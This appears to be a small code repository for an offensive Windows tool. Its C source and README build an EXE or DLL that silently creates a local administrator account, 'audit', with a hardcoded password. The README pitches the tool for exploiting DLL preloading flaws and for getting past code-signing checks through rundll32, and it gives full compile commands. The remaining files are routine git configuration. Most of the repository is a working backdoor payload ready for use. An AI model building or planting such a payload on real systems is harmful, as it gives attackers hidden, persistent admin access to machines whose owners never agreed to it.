├── .gitattributes
├── README.md
├── .gitignore
└── adduser.c


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | *.sln    merge=union
 7 | *.csproj merge=union
 8 | *.vbproj merge=union
 9 | *.fsproj merge=union
10 | *.dbproj merge=union
11 | 
12 | # Standard to msysgit
13 | *.doc	 diff=astextplain
14 | *.DOC	 diff=astextplain
15 | *.docx diff=astextplain
16 | *.DOCX diff=astextplain
17 | *.dot  diff=astextplain
18 | *.DOT  diff=astextplain
19 | *.pdf  diff=astextplain
20 | *.PDF	 diff=astextplain
21 | *.rtf	 diff=astextplain
22 | *.RTF	 diff=astextplain
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # adduser
 2 | 
 3 | Programmatically creates a 'local admin' Windows user. Requires admin rights. The created user is hardcoded to the following:
 4 | 
 5 | Login: `audit`
 6 | Password: `Test123456789!` (this should be good enough to fit most password policies)
 7 | 
 8 | This standalone piece code can run in many contexts:
 9 | - As a command-line EXE.
10 | - As a DLL (the user will be created on DLL load). This is useful to exploit "DLL Preloading" issues.
11 | - As a DLL, through `rundll32.exe adduser.dll,CreateAdminUser@16`. This is useful to bypass mandatory code signing applied to EXE files only.
12 | 
13 | ## Compiling
14 | ### Using MinGW (tested on macOS, but Linux should work)
15 | 
16 | - Create a 32-bit EXE file:
17 | `i686-w64-mingw32-gcc -oadduser32.exe adduser.c -lnetapi32`
18 | - Create a 32-bit DLL file:
19 | `i686-w64-mingw32-gcc -shared -oadduser32.dll adduser.c -lnetapi32`
20 | - Create a 64-bit EXE file:
21 | `x86_64-w64-mingw32-gcc -oadduser64.exe adduser.c -lnetapi32`
22 | - Create a 64-bit DLL file:
23 | `x86_64-w64-mingw32-gcc -shared -oadduser64.dll adduser.c -lnetapi32`
24 | 
25 | ### Using Visual Studio (tested with VS2013)
26 | 
27 | - Create an EXE file:
28 | `cl.exe adduser.c /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32`
29 | - Create a DLL file:
30 | `cl.exe adduser.c /LD /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32`


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | #################
  2 | ## Eclipse
  3 | #################
  4 | 
  5 | *.pydevproject
  6 | .project
  7 | .metadata
  8 | bin/
  9 | tmp/
 10 | *.tmp
 11 | *.bak
 12 | *.swp
 13 | *~.nib
 14 | local.properties
 15 | .classpath
 16 | .settings/
 17 | .loadpath
 18 | 
 19 | # External tool builders
 20 | .externalToolBuilders/
 21 | 
 22 | # Locally stored "Eclipse launch configurations"
 23 | *.launch
 24 | 
 25 | # CDT-specific
 26 | .cproject
 27 | 
 28 | # PDT-specific
 29 | .buildpath
 30 | 
 31 | 
 32 | #################
 33 | ## Visual Studio
 34 | #################
 35 | 
 36 | ## Ignore Visual Studio temporary files, build results, and
 37 | ## files generated by popular Visual Studio add-ons.
 38 | 
 39 | # User-specific files
 40 | *.suo
 41 | *.user
 42 | *.sln.docstates
 43 | 
 44 | # Build results
 45 | [Dd]ebug/
 46 | [Rr]elease/
 47 | *_i.c
 48 | *_p.c
 49 | *.ilk
 50 | *.meta
 51 | *.obj
 52 | *.pch
 53 | *.pdb
 54 | *.pgc
 55 | *.pgd
 56 | *.rsp
 57 | *.sbr
 58 | *.tlb
 59 | *.tli
 60 | *.tlh
 61 | *.tmp
 62 | *.vspscc
 63 | .builds
 64 | *.dotCover
 65 | 
 66 | ## TODO: If you have NuGet Package Restore enabled, uncomment this
 67 | #packages/
 68 | 
 69 | # Visual C++ cache files
 70 | ipch/
 71 | *.aps
 72 | *.ncb
 73 | *.opensdf
 74 | *.sdf
 75 | 
 76 | # Visual Studio profiler
 77 | *.psess
 78 | *.vsp
 79 | 
 80 | # ReSharper is a .NET coding add-in
 81 | _ReSharper*
 82 | 
 83 | # Installshield output folder
 84 | [Ee]xpress
 85 | 
 86 | # DocProject is a documentation generator add-in
 87 | DocProject/buildhelp/
 88 | DocProject/Help/*.HxT
 89 | DocProject/Help/*.HxC
 90 | DocProject/Help/*.hhc
 91 | DocProject/Help/*.hhk
 92 | DocProject/Help/*.hhp
 93 | DocProject/Help/Html2
 94 | DocProject/Help/html
 95 | 
 96 | # Click-Once directory
 97 | publish
 98 | 
 99 | # Others
100 | [Bb]in
101 | [Oo]bj
102 | sql
103 | TestResults
104 | *.Cache
105 | ClientBin
106 | stylecop.*
107 | ~$*
108 | *.dbmdl
109 | Generated_Code #added for RIA/Silverlight projects
110 | 
111 | # Backup & report files from converting an old project file to a newer
112 | # Visual Studio version. Backup files are not needed, because we have git ;-)
113 | _UpgradeReport_Files/
114 | Backup*/
115 | UpgradeLog*.XML
116 | 
117 | 
118 | 
119 | ############
120 | ## Windows
121 | ############
122 | 
123 | # Windows image file caches
124 | Thumbs.db
125 | 
126 | # Folder config file
127 | Desktop.ini
128 | 
129 | 
130 | #############
131 | ## Python
132 | #############
133 | 
134 | *.py[co]
135 | 
136 | # Packages
137 | *.egg
138 | *.egg-info
139 | dist
140 | build
141 | eggs
142 | parts
143 | bin
144 | var
145 | sdist
146 | develop-eggs
147 | .installed.cfg
148 | 
149 | # Installer logs
150 | pip-log.txt
151 | 
152 | # Unit test / coverage reports
153 | .coverage
154 | .tox
155 | 
156 | #Translations
157 | *.mo
158 | 
159 | #Mr Developer
160 | .mr.developer.cfg
161 | 
162 | # Mac crap
163 | .DS_Store
164 | 


--------------------------------------------------------------------------------
/adduser.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * ADDUSER.C: creating a Windows user programmatically.
  3 |  */
  4 | 
  5 | #define UNICODE
  6 | #define _UNICODE
  7 | 
  8 | #include <windows.h>
  9 | #include <string.h>
 10 | #include <Lmaccess.h>
 11 | #include <lmerr.h>
 12 | #include <Tchar.h>
 13 | 
 14 | 
 15 | DWORD CreateAdminUserInternal(void)
 16 | {
 17 | NET_API_STATUS rc;
 18 | BOOL b;
 19 | DWORD dw;
 20 | 
 21 | USER_INFO_1 ud;
 22 | LOCALGROUP_MEMBERS_INFO_0 gd;
 23 | SID_NAME_USE snu;
 24 | 
 25 | DWORD cbSid = 256;	// 256 bytes should be enough for everybody :)
 26 | BYTE Sid[256];
 27 | 
 28 | DWORD cbDomain = 256 / sizeof(TCHAR);
 29 | TCHAR Domain[256];
 30 | 
 31 | 	//
 32 | 	// Create user
 33 | 	// http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx
 34 | 	//
 35 | 
 36 | 	memset(&ud, 0, sizeof(ud));
 37 | 
 38 | 	ud.usri1_name		= _T("audit");						// username
 39 | 	ud.usri1_password	= _T("Test123456789!");				// password
 40 | 	ud.usri1_priv		= USER_PRIV_USER;					// cannot set USER_PRIV_ADMIN on creation
 41 | 	ud.usri1_flags		= UF_SCRIPT | UF_NORMAL_ACCOUNT;	// must be set
 42 | 	ud.usri1_script_path = NULL;
 43 | 
 44 | 	rc = NetUserAdd(
 45 | 		NULL,			// local server
 46 | 		1,				// information level
 47 | 		(LPBYTE)&ud,
 48 | 		NULL			// error value
 49 | 	);
 50 | 
 51 | 	if (rc != NERR_Success) {
 52 | 		_tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
 53 | 		return rc;
 54 | 	}
 55 | 
 56 | 	//
 57 | 	// Get user SID
 58 | 	// http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx
 59 | 	//
 60 | 
 61 | 	b = LookupAccountName(
 62 | 		NULL,			// local server
 63 | 		_T("audit"),	// account name
 64 | 		Sid,			// SID
 65 | 		&cbSid,			// SID size
 66 | 		Domain,			// Domain
 67 | 		&cbDomain,		// Domain size
 68 | 		&snu			// SID_NAME_USE (enum)
 69 | 	);
 70 | 
 71 | 	if (!b) {
 72 | 		dw = GetLastError();
 73 | 		_tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
 74 | 		return dw;
 75 | 	}
 76 | 
 77 | 	//
 78 | 	// Add user to "Administrators" local group
 79 | 	// http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx
 80 | 	//
 81 | 
 82 | 	memset(&gd, 0, sizeof(gd));
 83 | 
 84 | 	gd.lgrmi0_sid = (PSID)Sid;
 85 | 
 86 | 	rc = NetLocalGroupAddMembers(
 87 | 		NULL,					// local server
 88 | 		_T("Administrators"),
 89 | 		0,						// information level
 90 | 		(LPBYTE)&gd,
 91 | 		1						// only one entry
 92 | 	);
 93 | 
 94 | 	if (rc != NERR_Success) {
 95 | 		_tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
 96 | 		return rc;
 97 | 	}
 98 | 
 99 | 	return 0;
100 | }
101 | 
102 | //
103 | // DLL entry point.
104 | //
105 | 
106 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
107 | {
108 | 	switch (ul_reason_for_call)
109 | 	{
110 | 	case DLL_PROCESS_ATTACH:
111 | 		CreateAdminUserInternal();
112 | 	case DLL_THREAD_ATTACH:
113 | 	case DLL_THREAD_DETACH:
114 | 	case DLL_PROCESS_DETACH:
115 | 		break;
116 | 	}
117 | 	return TRUE;
118 | }
119 | 
120 | //
121 | // RUNDLL32 entry point.
122 | // https://support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface
123 | //
124 | 
125 | #ifdef __cplusplus
126 | extern "C" {
127 | #endif
128 | 
129 | __declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
130 | {
131 | 	CreateAdminUserInternal();
132 | }
133 | 
134 | #ifdef __cplusplus
135 | }
136 | #endif
137 | 
138 | //
139 | // Command-line entry point.
140 | //
141 | 
142 | int main()
143 | {
144 | 	return CreateAdminUserInternal();
145 | }
146 | 


--------------------------------------------------------------------------------